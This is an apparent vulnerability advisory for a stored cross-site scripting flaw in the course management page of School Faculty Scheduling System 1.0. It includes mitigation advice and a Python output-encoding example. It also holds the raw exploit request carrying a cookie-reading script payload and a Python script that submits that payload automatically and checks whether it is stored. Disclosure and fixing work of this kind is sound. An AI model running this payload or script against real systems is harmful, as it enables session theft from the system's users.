Vendor: School Faculty Scheduling System
By: Jyotsna Adhana
CVSS: 8.8 (HIGH)
CWE: 79 (Stored Cross Site Scripting)
Product Name: School Faculty Scheduling System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:school_faculty_scheduling_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
Year: 2020

School Faculty Scheduling System 1.0 – Stored Cross Site Scripting

School Faculty Scheduling System 1.0 contains a stored cross-site scripting vulnerability in the course management function of the admin panel. The Course and Description fields of a new course are accepted by admin/ajax.php?action=save_course as submitted, and the stored values are later written into the Course List page without output encoding. Any JavaScript placed in those fields is therefore executed in the browser of every user who views the Course List, in that user's session. The captured request below carries the PHPSESSID of a logged-in user, so creating the malicious course requires an account that can add courses, but the payload then runs for every subsequent viewer.

Mitigation:

Encode the stored values on output: every place the Course and Description fields are written into HTML should pass them through htmlspecialchars() with ENT_QUOTES, so that a stored <script> tag is displayed as text rather than executed. Input validation is a useful second layer (for example, rejecting angle brackets in a course name) but is not sufficient on its own, because a free-text field such as Description cannot be meaningfully whitelisted. As defence in depth, serve a Content Security Policy that disallows inline scripts (no 'unsafe-inline' in script-src), so that injected markup that does reach a page does not run, and set the HttpOnly flag on PHPSESSID so that script cannot read the session cookie that the proof-of-concept payload displays.
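The following is an added example, not code from the School Faculty Scheduling System or from the advisory author. It shows in Python the difference between the rendering pattern the advisory implies (stored fields concatenated straight into the Course List HTML) and the same row with output encoding, plus the response headers recommended above. html.escape(..., quote=True) stands in for PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); the function names, the row layout and the sample session id are assumptions made for the illustration.

```python
import html
import secrets

# Constructed sample input: the payload the advisory stores through save_course.
PAYLOAD = "<script>alert(document.cookie)</script>"


def render_course_row_vulnerable(course: str, description: str) -> str:
    """Assumed vulnerable pattern: stored fields written into the Course List as-is."""
    return f"<tr><td>{course}</td><td>{description}</td></tr>"


def render_course_row_hardened(course: str, description: str) -> str:
    """Same row with contextual output encoding.

    html.escape(s, quote=True) does what PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8')
    does: &, <, >, " and ' become entities, so the browser shows the text instead of
    creating elements. The stored value is left untouched; encoding happens at output.
    """
    return (
        f"<tr><td>{html.escape(course, quote=True)}</td>"
        f"<td>{html.escape(description, quote=True)}</td></tr>"
    )


def renders_active_markup(fragment: str) -> bool:
    """Cheap check used here to compare the two renderers: a raw '<script' or an
    inline event handler in the output means the field broke out of text context."""
    low = fragment.lower()
    return "<script" in low or " onerror=" in low or " onload=" in low


def security_headers(script_nonce: str, session_id: str) -> dict:
    """Defence in depth for the Course List response, independent of escaping.

    - CSP without 'unsafe-inline': a <script> that does reach the page will not run
      unless it carries this response's nonce. Every legitimate inline script in the
      template must get nonce="...", and the nonce must be regenerated per response.
    - HttpOnly on PHPSESSID: document.cookie is empty for injected script, so the
      alert(document.cookie) in the advisory shows nothing useful.
    """
    return {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'self' 'nonce-{script_nonce}'; "
            "object-src 'none'; base-uri 'self'"
        ),
        "Set-Cookie": f"PHPSESSID={session_id}; Path=/; HttpOnly; SameSite=Lax",
    }


if __name__ == "__main__":
    print("vulnerable:", render_course_row_vulnerable(PAYLOAD, PAYLOAD))
    print("hardened:  ", render_course_row_hardened(PAYLOAD, PAYLOAD))
    # A fresh nonce per response; the session id here is a constructed placeholder.
    for k, v in security_headers(secrets.token_urlsafe(16), "constructed-session-id").items():
        print(f"{k}: {v}")
```

The encoding shown is correct only for values that land in element text, which is where the Course and Description fields appear in a table. A value inserted into an attribute, a URL or a JavaScript string needs the encoding for that context instead; htmlspecialchars() alone is not enough there.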

Exploit-DB raw data:

# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses

Step 2: Enter the payload <script>alert(document.cookie)</script> in the Course and Description fields and save the new course. The browser submits the request below.

Malicious Request

POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
Content-Length: 478
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="id"


-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="course"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="description"

<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793--

Step 3: The payload is stored and the script runs, showing the visitor's cookie in an alert, each time someone visits the Course List section.
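The three steps above, as an added reproduction script that is not part of the advisory. It rebuilds the captured multipart request to ajax.php?action=save_course with the same three fields (empty id, course, description), then fetches the Course List and reports whether the payload came back raw, HTML-encoded, or not at all. The base URL and the PHPSESSID are supplied by the tester; that the Course List is rendered at admin/index.php?page=courses, and the boundary string, are assumptions made here.

```python
import html
import sys
import urllib.request

# Payload from the advisory; the boundary is an arbitrary token chosen for this script.
PAYLOAD = "<script>alert(document.cookie)</script>"
BOUNDARY = "----pocboundary7d1c3e"


def build_save_course_body(course: str, description: str,
                           boundary: str = BOUNDARY, course_id: str = "") -> bytes:
    """Reproduce the multipart/form-data body of the captured save_course request.

    An empty id creates a new course, matching the request in the advisory.
    """
    parts = []
    for name, value in (("id", course_id), ("course", course), ("description", description)):
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


def classify_course_list(page_html: str, payload: str = PAYLOAD) -> str:
    """Decide from the fetched Course List HTML whether the stored payload is live.

    'stored-raw': the tag is in the page unencoded and will run for every visitor.
    'encoded':    the value is shown as text (output encoding in place).
    'absent':     the course was not stored or is not shown on this page.
    """
    if payload in page_html:
        return "stored-raw"
    if html.escape(payload, quote=True) in page_html:
        return "encoded"
    return "absent"


def submit_and_check(base_url: str, phpsessid: str) -> str:
    """Post the malicious course, then fetch the Course List and classify it.

    base_url is the application root, e.g. http://localhost/schoolFSS/scheduling,
    and phpsessid the session of an account that can create courses (assumption:
    the Course List is the page at admin/index.php?page=courses).
    """
    cookie = f"PHPSESSID={phpsessid}"
    body = build_save_course_body(PAYLOAD, PAYLOAD)
    save = urllib.request.Request(
        f"{base_url}/admin/ajax.php?action=save_course",
        data=body,
        method="POST",
        headers={
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": cookie,
        },
    )
    with urllib.request.urlopen(save, timeout=10) as resp:
        resp.read()  # ajax.php returns a status value; the list page is the real check
    listing = urllib.request.Request(
        f"{base_url}/admin/index.php?page=courses", headers={"Cookie": cookie}
    )
    with urllib.request.urlopen(listing, timeout=10) as resp:
        return classify_course_list(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Usage: python poc.py http://localhost/schoolFSS/scheduling <PHPSESSID>
    print(submit_and_check(sys.argv[1].rstrip("/"), sys.argv[2]))
```

Run it against a test instance only, since it creates a course whose name will pop an alert for every admin who opens the list until it is deleted. The classification step is the part worth keeping after a fix: a result of "encoded" is what the htmlspecialchars() mitigation should produce.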